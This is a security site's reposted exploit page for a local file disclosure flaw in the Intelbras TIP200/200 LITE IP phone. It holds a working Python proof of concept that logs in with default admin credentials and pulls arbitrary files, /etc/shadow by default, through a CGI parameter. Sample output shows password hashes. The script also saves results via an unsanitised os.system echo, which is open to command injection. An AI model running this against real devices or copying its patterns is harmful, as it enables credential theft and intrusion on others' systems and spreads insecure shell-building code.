首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Intelbras Telefone IP TIP200 LITE - Local File Disclosure 来源：https://www.facebook.com/anhaxteam/ 作者：anhax0r 发布时间：2018-03-21   # Exploit Title: [INTELBRAS TELEFONE IP TIP200/200 LITE Local File Include] # Google Dork: [] # Date: 16/03/2018 # Exploit Author: [Matheus Goncalves - anhax0r] # Vendor Homepage: [https://www.facebook.com/anhaxteam/] # Software Link: [] # Version: [60.0.75.29] (REQUIRED) # Tested on: [Debian] # CVE : [if applicable]     #Remember that you need login with admin credentials to download files !!! in this case, i used default credentials   import requests as http import subprocess import os from requests.auth import HTTPBasicAuth def poc():     print("""                -------------------------------------------------------------------------------------------------------------                 ------------- 0day: TELEFONE IP TIP200/200 LITE | Local File Include | Local File Download-------------------                 -------------      P0c Author: Matheus Goncalves | Pentester at Anhax Security Team       -------------------                 -------------------------------------------------------------------------------------------------------------\n""")     filename = raw_input("filename Ex: /etc/shadow: -> ")     if(filename == ""):         filename="/etc/shadow"     r = http.get("http://192.168.0.207/cgi-bin/cgiServer.exx?page="+str(filename), auth=HTTPBasicAuth('admin', 'admin'))     print(" ")     text = r.text          print(text)     savefile = raw_input("Save file? [Y\\n]: ")     savefile.upper()     if(savefile=="Y" or savefile=="y"):         os.system("echo '"+text+"' > "+filename.replace("/etc/", ""))         print("File saved !!")         start()     else:         start()              def start():     poc()      start()     #root@hax:~/itscanner# python p0c.py #                ------------------------------------------------------------------------------------------------------------- #                ------------- 0day: TELEFONE IP TIP200/200 LITE | Local File Include |------------------- #                -------------      P0c Author: Matheus Goncalves | Pentester at Anhax Security Team       ------------------- #                ------------------------------------------------------------------------------------------------------------- #filename Ex: /etc/shadow: -> /etc/shadow   #root:$1$83hUAZ/2$GKlGOZlepa6eikA6mfG1l/:11876:0:99999:7::: #admin:DP7Kg4tE0Y9rs:11876:0:99999:7:::   #Save file? [Y\n]: y #File saved !!   #root@hax:~/itscanner# cat shadow #root:$1$83hUAZ/2$GKlGOZlepa6eikA6mfG1l/:11876:0:99999:7::: #admin:DP7Kg4tE0Y9rs:11876:0:99999:7:::   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Kamailio 5.1.1 / 5.1.0 / 5.0.0 ·Cisco node-jos < 0.11.0 - Re-s ·Microsoft Windows - Desktop Br ·Linux Kernel < 4.15.4 - 'show_ ·Internet Explorer - 'RegExp.la ·Kaseya Virtual System Administ ·Microsoft Windows Kernel - 'nt ·ModSecurity For Nginx Use-Afte ·Microsoft Windows Kernel - 'nt ·Android Bluetooth - BNEP bnep_ ·Microsoft Windows Kernel - 'Nt ·Android Bluetooth - BNEP BNEP_   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved